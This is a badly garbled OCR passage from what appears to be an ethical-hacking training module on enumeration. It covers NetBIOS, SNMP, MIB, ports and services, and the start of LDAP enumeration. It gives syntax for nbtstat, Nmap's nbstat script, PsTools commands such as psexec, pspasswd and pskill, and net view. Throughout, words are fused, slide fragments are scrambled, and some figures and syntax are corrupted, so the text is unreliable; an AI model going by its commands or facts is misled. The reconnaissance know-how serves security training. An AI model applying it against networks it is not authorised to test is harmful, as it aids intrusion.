(IPsec),Voiceover InternetProtocol(VoIP),
remote procedure call(RPC),Linux/Unix,
Telnet,File
‘Transfer
Protocol
(FTP),Server
6 (IPv6), Message
(SMB),
Protocol
Trivial
andBorderGateway
FTP(TFTP},
Protocol(8GP)
enumeration countermeasures.
Block Internet version
enumeration. Themoduleendswith an overview of
At theendof thismodule,
youwill beableto:
+
=
Describe
concepts
Explain
enumeration
differenttechniquesfor NetBIOS
enumeration
‘Explain
‘+
techniques
different
Explain
differenttechniques
for SNMPenumeration
for LDAPenumeration
Explain
differenttechniquesfor NTPenumeration
Explain
differenttechniquesfor NFSenumeration
Explain
differenttechniquesfor SMTPandDNSenumeration
Explain
other enumeration techniquessuchas IPsec,
VoIP, Linux/Unix,
RPC, FTP,
Telnet,
TFTP, andBGPenumeration
SMB,1PV6,
Apply
enumeration countermeasures
[NetBIOS
Enumeration SMTP
and
DNS Enameration
LDAPEnumeration
Enumeration Concepts
In theenumerationphase,
networkshares,
vulnerabilities
attackers
enumerate usernamesandotherinformation
i n thetargetnetwork andexploit
on
Thisinformationhelps
andservices of networkedcomputers.
themto hackthe system.
the
attackersidentify
groups,
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
What is Enumeration?
CEH
involves
aanatacker
byIntruders
on Enumerated
|@ Enumeration creating
active
Aenea racers
connectionswith targetsystem andpeeorming
“ected to gainmore formationaboutthe
target
queries
Nerworkshares
‘auc
and
Attackerswe extracted
information
to lent
for a system
points atacknd performpassword service setngs
Stackst o ai nunauthorizedaccesso information
systemresources nd FQDNdeals
‘NMP
Whatis Enumeration?
Enumeration
is the processof extracting names,networkresources,shares,
usernames, machine
andservices froma system In the enumeration phase,
or network. an attacker
creates active
connections with the systemand sendsdirectedqueriesto gain more informationaboutthe
target.Theattacker usestheinformation
collected usingenumeration to identify
vulnerabilities
in the systemsecurity,whichhelpthemexploit the targetsystem.In turn,enumeration allows
the attackerto performpassword
attacksto gain unauthorizedaccess to informationsystem
techniques
resources. Enumeration worki n an intranet environment,
In particular,
enumeration allowstheattackerto collectthe following
information:
Network resources SNMPandfullyqualified
=
domainname
=
=
Networkshares
Routing
tables
=
(FQDN)
details
Machinenames
*
Usersandgroups
=
Auditandservice settings
enumeration,attackers
During
=
ical andCountermensores
Mackin ©by E-Comel
Copyright
for Enumeration
Techniques
Extractusernames using Extractinformation
u sing
emailIDs defaultpasswords
BruteforceActiveDirectory Extractinformation
u sing
[DNSZoneTransfer
Extractu sergroups
from Extractusernames
Windows
using
SNMP
for Enumeration
Techniques
Thefollowing
techniques
are usedto extract informationabout a target
+
Extract usernames using
emailIDs
emailaddress
Every
contains
a username and a domain
two parts,
“username@domainname.―
name, i n the format
Extractinformation
usingDNSZoneTransfer
‘A
networkadministratorcan use
zone-transfer
specific
DNS
zone across
transferto replicate
DNSdata several
DNSservers or backup DNSfiles.For this purpose,the administratorneedsto execute a
requestto the name server. If the name server permitszone
ical andCountermensores
Mackin ©by E-Comel
Copyright
it will convert all theDNSnamesandIPaddresses
transfer, hostedbythatserver to ASCII
text.
did not configure
If the networkadministrators the ONSserver properly,
the DNSzone
transfercan be an effectivemethodto obtain informationabout the organization's
network.Thisinformationmay
addresses. Auser can performinclude
lists
of
zone
DNS
all namedhosts,
transferusingnslookup
sub-zones,
andrelatedIP
anddigcommands.
Extractu ser groupsfromWindows
To extract user groupsfromWindows,the attackershouldhavea registeredID as a user
in the ActiveDirectory.Theattacker
can then extract information
fromgroupsin which
the user is a memberbyusingthe Windowsinterfaceor command-line method.
Extract usernamesusingSNMP
can easily
‘Attackers guessread-onlyor read-write community stringsbyusingthe SNMP
application
programming interface(API)to extract usernames.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Servicesand Portsto Enumerate
a= oman
Nome (Oo Tamer
3)
>
[rerniorae
ap incr ha tw
SAP)
rer/uoP135 re92009
ES [eer wcenonirm I
Ter/u0P
848s oe TE ret ot
vor S00
‘inert ey cone
ServicesandPortsto Enumerate
Control Protocol (TCP)
Transmission and User Datagram
Protocol (UDP)
manage data
communicationsbetween
terminals
i n a network.
Supports
acknowledgement
for dataa
the following:
receiving throughsliding
window
acknowledgement system
Offersautomatic retransmissionoflostor acknowledged
data
Allowsaddressing andmultiplexingof data
A connection can be established,
managed,
or terminated
=
Offersquality-of-service
transmission
Offers congestion andflowcontrol
management
UDPis a connectionless that carries shortmessages
protocol network.It
over a computer
provides
unreliable
=
service.UDP the
Theapplications
Audiostreaming
of include following:
and
Videoconferencing
teleconferencing,
ical andCountermensores
Mackin ©by E-Comel
Copyright
andTCP/UDP
Services portsthatcan beenumerated thefollowing.
include
53:Zone
Transfer
‘TCP/UDP
DNS
TheDNSresolutionprocess establishes communication betweenDNSclientsand ONS
servers. DNSclients sendDNSmessages to DNSservers listeningon UDPport53. If the
DNS
message
size
exceeds
defaultoctets),
response
contains
the
the datathat UDP can accommodate,
size of UDP (512 the only
and the DNS server setsa flagto indicatethe
ical
(NBT)
protocol
andCountermensores
Mackin
to work
©by E-Comel
Copyright
on TCP/IP Directly
transport. andUDP)
hostedSMBtrafficusesport445(TCP instead
of
NetBios.
UDP161: Simple Protocol(SNMP)
NetworkManagement
SNMPis widely used i n network management systemsto monitor network-attached
devicessuchas routers, switches,
firewalls, andservers. It consistsof amanager
printers,
andagents.Theagentreceives requestson port161fromthe managers andresponds to
the managerson port162.
TCP/UDP
389:Lightweight
Directory
AccessProtocol(LDAP)
LDAP is a protocol
for accessing distributeddirectory
and maintaining information
services over an IPnetwork.Bydefault,LDAPusesTCPor UDPas its transport
protocol
overport 389.
(NFS)
2049:NetworkFileSystem
‘TCP
NFSprotocol is usedto mount filesystems on a remote hostover a network, and users
as if they
with the file systems
‘aninteract are mountedlocally. NFSservers listento its
client systems o n TCPport 2049. If NFSservices are not properly configured, then
attackersmay exploit the NFSprotocol to gain controlover a remote system, perform
privilege injectbackdoors
escalation, or malware
o n a remote host,
ete.
Mail Transfer
TCP25: Simple Protocol(SMTP)
SMTP TCP/IP
is a maildelivery protocol.
It transfersemailacross the Internet andacross
localnetworks.
It runs on the connection-orientedservice provided byTCPandusesthe
well-knownportnumber25.Belowtablelistssome commands usedbySMTPandtheir
respective
syntaxes.
Hello
From
Recipient.
Data
Reset
Verity
Expand
Help
uit
TCP/UDP
162:SNMPTrap
Table
4.1:SMTP
and
c ommands theirrespective
sytaxes
SNMPtrapuses
‘An TCP/UDP
port162 to sendnotificationssuchas optional
variable
bindings
andthe sysUpTime
toa
valuefroman agent manager.
ical andCountermensores
Mackin ©by E-Comel
Copyright
AssociationandKeyManagement
UDP500:Internet Security Protocol
(ISAKMP)/Internet
KeyExchange
(IKE)
Internet Security Association and KeyManagement Protocol(ISAKMP)/InternetKey
Exchange (IKE)
is a protocol
suite. It uses UDP port 500 to establish,
cryptographic keys
security
association
usedto set upa
negotiate,
network(VPN)
i n a virtual private
(SA)
modify,
environment.
protocol
i n theIPsec
and delete SAs and
TCP22:SecureShell(SSH)
Secure Shell (SSH) is a command-level protocolmainlyusedfor managingvarious
networkeddevices
Telnetprotocol.
default,
securely.
used
as
tis generally an alternative
SSHuses the client/server communication model,
listensto its clienton TCPport22.Attackersmayexploit
to
the
protocol unsecure
andtheSSHserver, by
the SSHprotocolby
brute-forcing SSHlogin credentials
TCP/UDP3268:GlobalCatalog
Service
GlobalCatalog
Microsoft’s server, a domain
controller
thatstoresextra information,
port3268.Itsdatabasecontains rows for everyobject
in the entire organization,
uses
instead
of rows for
only
the objects
Catalog
i n one domain.Global
fromany domainwithout having one allows to locateobjects
to knowthedomainname. LOAP
through
server uses port 3268. Thisservice listensto port 3268
in theGlobalCatalog
a TCP connection
Administratorsuse port 3268 for troubleshooting issues in the Global Catalog by
connecting to it usingLOP.
‘TCP/UDP5060,5061:Session (SIP)
Initiation Protocol
TheSession initiationProtocol(SIP)is a protocol forvoice and
usedi n internettelephony
Videocalls.It typicallyuses TCP/UDP port$060(non-encrypted signaling
trafic)or S061
{encryptedtrafficwith TLS) forSIPto servers andotherendpoints
TCP20/21:
FileTransfer
Protocol
FTPis a protocol
connection-oriented usedfor transferring
files over the Internetand
privatenetworks. FTPis controlledo n TCPport21,and fordatatransmission, FTPuses
TCPport20 or some dynamic portnumbersdepending on the server configuration. If
attackers
identify
that FTPserver portsare open,thenthey perform enumeration on FTP
to find informationsuchas the softwareversion and state of existing
perform further exploitations
suchas the sniffing
vulnerabilitiesto
of FTP traffic and FTP brute-force
attacks.
TcP23: Telnet
TheTelnetprotocolis usedfor managing various networkeddevices remotely. It is an
unsecure protocolbecauseit transmits logincredentialsin the cleartext format.
Therefore,
itis mostly
usedi n privatenetworks.TheTelnetserver listensto its clientson
port23.Attackers
can takeadvantage to perform
ofthe Telnetprotocol bannergrabbing
onprotocols
other
SMTP,
forwarding brute-forcing
attacks,attacks
credentials
suchas SSHand
etc.
on login port-
ical andCountermensores
Mackin ©by E-Comel
Copyright
UDP69:TrivialFileTransfer (TFTP)
Protocol
TFTPis a connectionless protocol usedfor transferringfiles over the Internet, TFTP
on UDP; not the
dependsconnectionlesstherefore,
properit does guarantee
of the file to the destination.TFTPis mainlyusedto update or upgrade
firmwareon remote networkeddevices.It uses UDP port69 for transferring
transmission
softwareand
files to a
remote host.Attackersmayexploit TFTPto installmalicioussoftwareor firmwareon
remote devices.
TCP179:Border Protocol(BGP)
Gateway
BGPis widely usedbyInternet service providers (ISPs)to maintain huge routingtables
andfor efficiently
processingInternet traffic.BGProuters establishsessions on TCPport
179.Themisconfigurationof BGPmayleadto various attackssuchas dictionary attacks,
attacks,
resource-exhaustion flooding attacks,andhijackingattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow ¢
[NetBIOS
Enumeration SMTPand DNSEnameration
LDAPEnumeration ‘Enumeration
Countermeasures
NetBIOSEnumeration
“©
ANet910s
are
names
eedforthe
2
character
device
name, dently
characte
r record
unique16ACI
type
andthesistent
stringwed
freserved
thenetworkSecs
fortheservice
ver
name
TRAPfen characters
Tento¥
name
NetBIOSEnumeration(Cont'd)
T heasta syn Windows splaysNetBIOS
over
TEI (Nets)
NetBIOSEnumeration
far,w e discussed
‘Thus enumeration concepts andresourcesthat provide valuableinformation.
Thissection describesNetBIOSenumeration, the informationobtained,and various NetBIOS
enumeration tools.NetBIOSis considered firstfor enumeration because it extracts a large
amount of sensitive informationaboutthe targetnetwork, suchas users andnetworkshares.
‘The
firstenumerating
was
stepi n
originally
developed
sharing.
resources. Windows
of
advantage
NetBIOS
API. a Windows is to take
system the
as an API for client softwareto access local area network (LAN)
uses Net8I0S for file andprinter TheNetBIOS name is a unique 16-
NetBIOS.
‘=
The
Thecomputers
list of
shares
the domain
individual
hosts
list of
networkon
that belong
to a
in a
=
Policies
who
andpasswords
attacker findsa Windows
‘An system with port139opencan check to see whichresources
can beaccessed or viewedon a remote system. However,to enumerate theNetBIOS names,the
remote system sharing.
must haveenabled fileandprinter NetBIOSenumeration mayenable an
attackerto reador write to a remote computer depending
system, of shares,
o n the availability
or launcha DoSattack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
|| ||
host name>
<domain>
<00>
<00> GRouP
||Domain
UNIQUEHostname
name
<host
|| |name>
<username>
<03>_| UNIQUE
<03> UNIQUE
|Messenger
service
|Messenger
forlogged-in
service
runningfor the computer
running the user
|| | |Server
service
host name> <20>_| UNIQUE running
<domain> <1D> GROUP
|Master
name
forsubnet,
browser
Domainmasterbrowser
the
name,whichidentifies
theprimary
| |
sdomain <18> UNIQUE
|domain
controller
(POC)
domain for the
| | |
‘domains <1E> GROUP Browserservice elections
Table 42:
NetBIOS
name at
Nbtstat Utility
Source:https://docs.microsoft.com
utilitythat helps
Nbtstati s a Windows i n troubleshooting name resolutionproblems.
NETBIOS
Thenbtstat commandremoves and corrects preloaded
entries using severalcase-sensitive
switches.
Attackersuse Nbtstatto enumerate information (NetBT)
suchas NetBIOSover TCP/IP
protocol NetBIOS
statistics, name tablesfor bothlocaland remote computers,andthe NetBIOS
name cache,
Thesyntaxofthenbtstatcommand is as follows:
nbtstat [-a RemoteName] [-A IP Address] [-c]
[-8] [Interval]
Thetable shownbelowlistsvarious Nbtstatparameters
andtheirrespective
functions.
Nbtstat
Function
Parameter
=a RemoteNiameDisplays
| sheNetBIOScomputer of
the NetBIOSname table a remote computer,
name of the remote computer
whereRemoteNameis,
“A
IP Address
notation)
address(indotteddecimal of specified
the NetBIOSname table a remote computer,
Displays
of the remotecomputer
bytheIP
of
Liststhe contents the NetBIOS
their resolvedIPaddresses,
name cache,
the tableof NetBIOSnames and
ical andCountermensores
Mackin ©by E-Comel
Copyright
thename cache
Purges allHPRE-tagged
andreloads entriesfromthe Lmhosts
file
Releases all names with thename
and re-registers server
Liststhe NetBIOS
NetBIOSnames
sessions table converting
destination IP addressesto computer
Table4.3:
Nbstatparametersandthelr respective func
following
‘The are some examples
for nbtstatcommands.
=
Thenbtstatcommand
“nbtstat
~a <IP address of the remote machine>"
can
beexecutedto obtainthe NetBIOS
a
n ame tableof remote computer.
=
4;
Figure
Nbtstat table
remote
command
Thenbtstatcommand“nbtstatce―
system
to obtainthe name
can beexecuted
ofa
42; Nbtstat
Figure commandto obtainthe contentsofthe NetBIOS
name table
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
NetBIOS
Enumeration
Tools CEH
|
none,
:Sxethor Donan
nome
Usonesa
‘Nmap
feow scot
bare alow
aac
tine
NetBIOSEnumerationTools
enumeration toolsexplore
NetBIOS andscan a networkwithin a given range of IPaddresses
and
listsof computers to identify loopholes
security or flawsi n networked systems.Thesetoolsalso
enumerate operating systems(OSs),
users,groups,Security Identifiers(SIDs),
passwordpolicies,
services, service packs and hotfixes,
NetBIOSshares, transports, sessions,disksand security
event
+
logs,
ete.
NetBIOSenumerator
Source:http://nbtenum.sourceforge.net
NetBIOSEnumeratoris an enumeration tool that showshowto use remote network
supportand to dealwith some other web protocols,suchas SMB.As showni n the
attackers
screenshot, u se NetBIOSEnumeratorto enumerate detailssuchas NetBIOS
names,usernames,domainnames,andmediaaccesscontrol(MAC)
addresses
for a given
rangeof IP addresses.
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetBIOS
Enumerstor
an
‘Attackers
to
specty IPrange
NetBIOS
information
‘enumerate
‘Obtain
information,
such
NetBIOS
5
names,
-Fle ‘usernames,
domain
ersten Se
and
MAC
SERVERIOU6Sever Ser
DUsers:
&Donan:
Qoone
WIC: 0000-2
ged on ‘names,
addresses
@ Rand
4.3:Sceenshot ofNetBIOS
Figure Enumerator
Nmap
Source:https://nmap.org
Attackersuse the Nmap ScriptingEngine (NSE)for discovering NetBIOSshareson a
network.Thenbstatscriptof NSEallowsattackers
and MACaddresses.
logged-in
Bydefault,
if theverbosity
user. However,
to
the scriptdisplays retrieve
the target'sNetBIOS
the name of the computer
isturnedup,it displays
n ames
andthe
all names related
to that
system.
‘As an attackeruses the following
showni n the screenshot, Nmapcommandto perform
NetBIOSenumeration on a targethost:
--script nbstat.nee <target IP address>
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘cript_nbstatnse10.10,10.16
starting Nmap7.70
ipt
(
Figure44:
Screenshot
of Nmap
c ommand
for
Net810S
enumeration
Thefollowing
Figure
45:
some
NetBIOS
enumeration
output
Screenshot
additionalNetBIOS
of Nmap
are (http://www.magnetosoft.com)
enumeration tools:
GlobalNetworkInventory
=
Advanced (http://www.advanced-ip-scanner.com)
IP Scanner
=
(https://www.systemtools.com)
Hyena
Auditor (https://www.nsauditor.com)
NsauditorNetworkSecurity
ical andCountermensores
Mackin ©by E-Comel
Copyright
UserAccounts
Enumerating
|G Enumerating
user accountsusingthePsTools
suitehelp to conto n d fomthe
r emote systems
manage
UserAccounts
Enumerating
Source:https://docs.microsoft.com
user accounts usingthe PsTools
Enumerating i n controlling
suite helps and managingremote
fromthe commandline. Thefollowing
systems are for enumerating
some commands user
accounts.
=
PsExec
is a lightweight
PsExec Telnetreplacement
that can execute processes
on othersystems,
complete without having
for consoleapplications,
with full interactivity to installclient
softwaremanually,
powerful
use of
PsExec’s
most caseis thelaunch interactivecommand
and remote-enabling
promptson remote systems toolssuchas Ipconfigthat otherwise
follows about
remote of
cannot showinformation Thesyntaxthe PsExec
systems, command i s as
[-h]{-s|-e] [-c [-
psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd]
n s][-r servicename] [-1] [-x][-I [session] [-f1-
v]] [-w directory] [-d] [-<priority>][-a n,n,...] md [arguments]
PsFile
PsFile
utility a of opened
is acommand-line thatshows list fileson a system
andit can closeopened
fileseither byname
that remotely,
or bya file identifier.Thedefaultbehaviorof
PsFile
PsFile
isto
list
the
files
"-"
followedby
command
local
system by
on the
displays
is as follows:
a opened remote systems.
informationon the syntaxfor that command.
Typingcommand
Thesyntax
of the
ical andCountermensores
Mackin ©by E-Comel
Copyright
PsGetsid
PsGetSid translatesSIDsto their displayname and vice versa. It workson built-in
accounts,domainaccounts,andlocalaccounts.It alsodisplays the SIDsof user accounts
andtranslatesan SIDinto the name that representsit. It worksacross the networkto
query SIDsremotely.Thesyntax of the PsGetSid
command is as follows:
on
the Pskill
is ID
thelocalcomputer.
name Pskill
Running witha process directsi t to kill theprocessofthatID
all that
localcomputer.
have
Ifa process specified, wll kill processes
syntax
of to
that name. Oneneednot installa clienton thetarget
The
a remote process. the Pskillcommand
computeruse Pskillto terminate
i s as follows:
pskill [- ] [-t] [\\computer[-u username] [-p password] <process
name | process id>
Psinfo
Psinfo
i s acommand-line
WindowsNT/2000
organization
tool that
systems, gathers
including
keyinformation
aboutlocalor remote legacy
the typeof installation,
andowner, numberof processors
kernel build,registered
and their type,amount of physical
Bydefault,Psinfo
be specified
of
memory, installationdate the system,
showsinformation
andexpiration
datei n the case of atrialversion.
forthelocalsystem.A remote computer
to obtain informationfor a remote system.
name can
The syntaxof the Psinfo
commandi s asfollows:
psinfo [{\\computer{,computer[,..]| @file
(-p psswd]]] [-b] [-s] [-d] [-e [-t delimiter]] —
[-u
[¢ilter]
PsList
PsListis a command-linetool that displays unit (CPU)
centralprocessing and memory
informationor thread statistics.Toolsin the ResourceKits,pstatand pmon,show
differenttypesof dataonly
PsLoggedOn
for
the processeson the system
on whichthe toolsare run.
PsLoggedOn
is an applet
thatdisplays
boththe locally
logged-in
usersanduserslogged
in
intIfhe
via resources for eitherthe localcomputer or a remote one. a username is specified
insteadof acomputer,
where
the
user's
situations
and PsLoglist credentials
access
Log,
security
retrieves message
wouldnot permit
stringsfrom the computer
stored.Thedefaultfunctionof PsLogList is to display
to the Event
on whichthe event logis
the contents of the System Event
Logo n the localcomputer with visually
friendly formatting.Thesyntaxof the PsLoglist
commandi s as follows:
psloglist [- ] [\\computer{,computer[,...] | @file [-u username [-
P password}]][-s [-t delimiter]] [-m #I-n #1-h #I-d #1-w][-c] [-
{-b [-£
xl (-2] [-a mm/dd/yy] mm/dd/yy] filter] [-i ID[,2D[,...] | -e
ID[,ID[,...]]] [-0 event source[,event source]
source[,event source]
[,..]]][-a event
[,..]]][-1 event log file] <eventlog>
PsPasswd
PsPasswd c an change a n account password on local or remote systems, and
administrators can create batchfilesthat run PsPasswd on the computerstheymanage
to perform a mass change of the administratorpassword, PsPasswd uses Windows
password reset APIs; therefore, it doesnot send passwords over the network i n the
cleartext.Thesyntax ofthePsPasswd command i s as follows:
pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]]
Username[NewPassword]
PsShutdown
PsShutdown can shutdownor reboota localor remote computer.
It requires no manual
of
installationclient software.
ThesyntaxofthePsShutdown
psshutdown[[\\computer{,computer[,..]|
command i s as follows:
| @file [-u user [-p
psswd]}] -s|-r{-hl-dl-kl-al-1l-0 [-£]
[-e] [-t an{h:m] [-n s] [-v
an] [-e [ulp]:xx:yy] [-m "message"]
ical andCountermensores
Mackin ©by E-Comel
Copyright
Net
SharedResourcesUsing View
Enumerating
(© T h e
Wets aist
of
allshared
resoutes
Viewuty
ofa
remote
host
workgroup
t o obtain
used the or
‘NetView
Commands
©
©
netview
notview
\\ccomputername>
/domain<domain
name>
[Fora
SharedResourcesUsing
Enumerating Net View
NetView is a command-line utilitythat displays
a listof computers i n a specified
workgroup
or
shared o n a specified
r esources available computer.It can beusedi n thefollowingways.
net view \\<computername>
In theabovecommand, <computername>
resources of whichare to be displayed,
is the nameor IP
address
specific
computer,
of a the
net \\<computername>
view /ALL
all
Theabovecommand
shares.
displaystheshareso n thespecified along hidden
remote computer,
with
net view /domain
‘The
net view
all inthe
displays
abovecommand
/domain:<domainname>
the shares domain,
‘The displays
abovecommand all theshareso n the specified
domain.
ical andCountermensores
Mackin ©by E-Comel
Copyright
screenshot
‘The r esourcesavailableon the specified
showstheshared computer,
Command Prompt
Administrator.
BEd
4.6:
of command
Figure Output Net View
8
Module 412
Page tical andCountermensores
Making Copyright©
by Comet
ModuleFlow
[NetBIOS
Enumeration
LDAPEnumeration
SNP userholds
process two
enumerating
the
SNMP
enumeration
community
strings
ithe (©SNMP passwords
configure
to (e Aackers use these
default
Sccounte
devices
of and
‘access ta entract
and {agent fomthemanagement Information device
target
system
on a about
usingSNMP station
consists
Rea sting:
tackersenumerateSNMP to
alows
forthe
ts
an agents
SNMP ofmanager © community pub tetra informationabout
and agent; are by default wing network resources, such
a3
embeded on everynetwork ofthedes ontguation hosts, and
routers,devices,
‘evi,andthemanageris shares,andnetwork
Insaledon
by9
traffic
separate
feat
prnate dtl
sing ts
community
allowsrete information,suchaARP tables,
routingtables,and
S Ea &
SNMPEnumeration
SNMP allows network administrators
to managenetworkdevicesfrom a remote location
However, vulnerabilities,
SNMPhasmanysecurity suchas a lackof auditing,
Attackersmaytake
advantage
of thesevulnerabilitiesto perform
account and deviceenumeration. Thissection
describes
SNMPenumeration, the informationextractedvia SNMPenumeration,and various
SNMPenumeration toolsusedto enumerate user accountsanddeviceson a target
system,
ical andCountermensores
Mackin ©by E-Comel
Copyright
SNMPis an application-layer that runs on UDPandmaintains and managesrouters,
protocol
hubs,
andswitcheson an IP network.SNMPagentsrun on Windowsand Unix networkson
networking
devices.
SNMPenumeration is the process
of creatinga listof the user’s
accountsanddeviceson a target
computerusingSNMP.SNMPemploys two types of softwarecomponents for communication
theSNMPagentandSNMPmanagement station, TheSNMPagenti s locatedon the networking
device,
andthe SNMPmanagement station communicateswiththe agent.
Almostall the networkinfrastructuredevicessuchas routersandswitchescontain an SNMP
agent; the
agentfor managingsystem
variablesaccessible
management
station
sendstothe
or devices.TheSNMP
the agentreplies.
afterreceivingthe request, Bothrequests
bythe agentsoftware.SNMPmanagement
andreplies
requests
are configuration
stations sendrequeststo set
values
tosome let
Traps the station
management
variables.
know
ifan event
such
asa
rebootor an interfacefailurehasoccurredat theagent's
side.
abnormal
SNMPcontainsthe following
two passwords
for configuring
andaccessingtheSNMPagentfrom
themanagement
station.
=
ReadCommunityString
© The configuration
of the deviceor systemcan be viewedwith the helpof this
password.
©.
These
public.
stringsare
=
©
Community
Read/Write
String
Thedeviceconfiguration
can be changed
or editedusing thispassword.
©. Thesestrings
are private.
tables,
device-specific
information,andtrafficstatistics.
CommonlyusedSNMPenumeration toolsincludeOpUtils
(https://www.manageengine.com)
Monitor (https://www.solarwinds.com)
andNetworkPerformance
ical andCountermensores
Mackin ©by E-Comel
Copyright
of SNMP
Working
ofSNMP
Working
SNMPuses a disturbedarchitecture
comprising SNMPmanagers, SNMPagents,and several
relatedcomponents.Thefollowingare some commands associated
with SNMP.
*
=
GetRequest:
GetNextRequest:
manager
Usedbythe SNMP
Usedbythe SNMP
information
to request
continuously
manager
all agent
froman SNMP
to retrieve thedatastored
inan arrayor table
Used
by
Used an
GetResponse:
SetRequest: by the
SNMP
SNMP
to a
agent satisfyrequest by
manager modify
t o the
made the SNMPmanager
valueof within an
a parameter
‘SNMP agent’s
managementinformationbase(MIB)
Trap:
event
by
ofa
pre-configuredmanager
Used an SNMPagentto informthe SNMP certain
Thecommunication
‘+
TheSNMP
process
manager
(Host and
X,10.10.2.1)
SNMP as
betweenan SNMPmanager
to
agentis follows.
uses the GetRequest
command senda request
APIlibrary
To perform
this,
suchas the MicrosoftSNMP
(Wsnmp32.dll).
+
TheSNMPagent(Host Y)receives the messageand verifiesif the community string
{Compinfo)
is present checks
on its MIB, the request its list ofaccesspermissions
against
for that community,
andverifiesthe source IPaddress
ical andCountermensores
Mackin ©by E-Comel
Copyright
If the SNMPagentdoesnot findthe community
stringor accesspermission
in HostY's
MIB databaseandthe SNMPservice is set to senda n authenticationtrap,it sendsan
failuretrapto thespecified
authentication trapdestination,HostZ.
Themaster agentcomponent of theSNMPagentcallsthe appropriate
extensionagentto
retrieve the requested
session informationfromthe MIB.
Usingthe sessioninformation
retrievedfromthe extension agent,the SNMPservice
formsa return SNMPmessagethat contains the numberof active sessions and the
destination (10.10.2.1)
IP address of theSNMPmanager,HostX
Host¥sendsthe response
to HostX.
comma
Seng
“Conant
Gah
ot
2(MP Stage)
(24.7:lusrationoftheworking
ofSNMP
ical andCountermensores
Mackin ©by E-Comel
Copyright
InformationBase(MIB)
Management
'Mibicavitual
managed databace
usingSNMP
containing description
2 format objects
ofallthe network thatcanbe
T heMiBdatabase ishierarchcal
andeachmanaged
objetina MBs adressethoughObject
dentfiers (10s)
managed
abject
Twotypesof exist
(1Dtheobject,
a8
includes typeofMIB such counter,
stringadres: acces lve, sucha8 not
uses
SNMP
MB's the Nerarcical
hhuman-eadabledslay
namespace O1Dstoarate
containing theOIDnumbersinto
a
Information Base(MIB)
Management
MIB is a virtualdatabasecontaining a formaldescription of all the networkobjects
that SNMP
manages.It is a collection of hierarchically organized information. It provides
a standard
representation
object of
the
SNMP
agent's
information
identifiers(O1Ds). andMIBare storage. elements recognized
An OID is the numeric name givento an object andbegins
using
withthe root
of
MlB-managed
uniquely
objects
identify
the MIB tree. TheOIDcan
includescalarobjects,
the objectin the MIB hierarchy,
whichdefinea single object instance,andtabular
objects,whichdefinea groupofrelatedobject instances.OIDsincludetheobject'stype(suchas
or address),
counter, string, as reador read/write),
access level(such andrange
size restrictions,
information.
TheSNMP
asa codebook. manager
converts
OIDs display
human-readablethe into a usingtheMIB
‘A.user
canaccess the contents of the MIB byusing a web browsereither byenteringthe IP
addressand Lseries.mib or byentering the DNSlibraryname and Lseries.mib.For example,
http://IP.Address/Lseries.mib
or http://library_name/Lseries.mib.Microsoft
provides
the list of
MBsthat are installedwiththe SNMPservice i n theWindows resource kit.ThemajorMIBsare
as
follows:
=
DHCP.MIB:
Monitors networktrafficbetweenDHCPservers andremote hosts
‘=
HOSTMIB.MIB:
host
Monitorsandmanages resources
‘=
LNMIB2.MIB:
‘MIB_ILMIB:
Contains
Manages
object
types
workstation
TCP/IP-based
for
Internetusinga simple
andserver services
architectureandsystem
WINS.MIB:FortheWindowsInternetNameService(WINS)
ical andCountermensores
Mackin ©by E-Comel
Copyright
SNMPEnumerationTools
SSnmpeheck
| pace otpatn
wry
burn
ode
SNMPEnumerationTools
SNMPenumeration toolsare usedto scan a single
to Module)
networkdevices monitor,diagnose,
enabled andtroubleshoot a
IPaddressor range of IPaddresses
security threats.
of SNMP-
‘=
Snmpcheck
(snmp_enum
http://www.nothink.org
Source:
Snmpcheckis an open-source tool distributedunderthe GNUGeneralPublicLicense
(GPL).
Its goali s to automate the processof gathering
information
o n any devicewith
SNMPsupport(Windows, Unix-like,network appliances,
printers,etc.).Snmpcheck
allows ofSNMP
devices
and
user-friendly thein
places output
theenumeration
format.It couldbeusefulfor penetration
a human-readable
testingor systems
and
monitoring.
Attackersuse this tool to gather informationabout the target,suchas contact,
description,write access,devices,domain, hardware
andstorage information,
hostname,
Internet InformationServices (li) statistics,
IPforwarding,
listeningUDPports,location,
mountpoints, networkinterfaces, networkservices, routinginformation,software
components, uptime,TCPconnections,
system total memory, uptime,anduser accounts.
ical andCountermensores
Mackin ©by E-Comel
Copyright
4.8:of showing
Figure
us
Screenshot snmpcheck syteminformation
and
SoftPerfect
NetworkScanner
Source:https://www.softperfect.com
SoftPerfect
can discover
shared
NetworkScanner ping computers,
any information
retrieve practically
scan ports,
aboutnetworkdevices via Windows
folders,and
Management
Instrumentation
filtering
(WMI),
SNMP,
anddisplay
Transfer
Protocol
options;
SSH,
and
Hypertext (HTTP),
files,andperformance
Italsoscansforremote services,registry,
andexportsNetScan
PowerShell
counters;offersflexible
resultsto a varietyof formatsranging
fromExtensible MarkupLanguage (XML)to JavaScript Object Notation(JSON).
SoftPerfect
Moreover, NetworkScannercan check
fora user-defined
portandreportif
one is
it
remote
IP range.It supports and
open. In addition,can resolvehostnames auto-detectthe localandexternal
shutdown andWake-on-LAN.
Attackersusesthistool to gather
informationabouta sharedfolderand
network
devices.
pen
Device
Send
Message
Gree Bach File
Deleterom
Figure420:
Screenshot
ofSoftPerfect
Network
Scanner
following
‘The are some additionalSNMPenumeration tools:
Monitor (https://www.solarwinds.com)
NetworkPerformance
(https://www.manageengine.com)
‘OpUtils
NetworkMonitor (htps://wwwpaessler.com)
PRTG
Toolset(https://www.solarwinds.com)
Engineer's
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
[NetBIOS
Enumeration
LDAPEnumeration
LDAP Enumeration
Aclenttarts LDAP
by
session to a decor system
connecting
agent
(5A] on TCPport 369and
LDAP Enumeration
Various protocols
enablecommunication andmanagedatatransferbetweennetworkresources.
All theseprotocolscarryvaluableinformation aboutnetworkresources alongwith the data,An
enumerates that informationbymanipulating
externaluser who successfully the protocolscan
breakinto the
Protocol(LOAP)networkandmaymisusethenetworkresources.TheLightweight
is one suchprotocol listings.
that accesses the directory
Directory
Access
Thissection focuseso n
ical andCountermensores
Mackin ©by E-Comel
Copyright
LDAPenumeration,the information
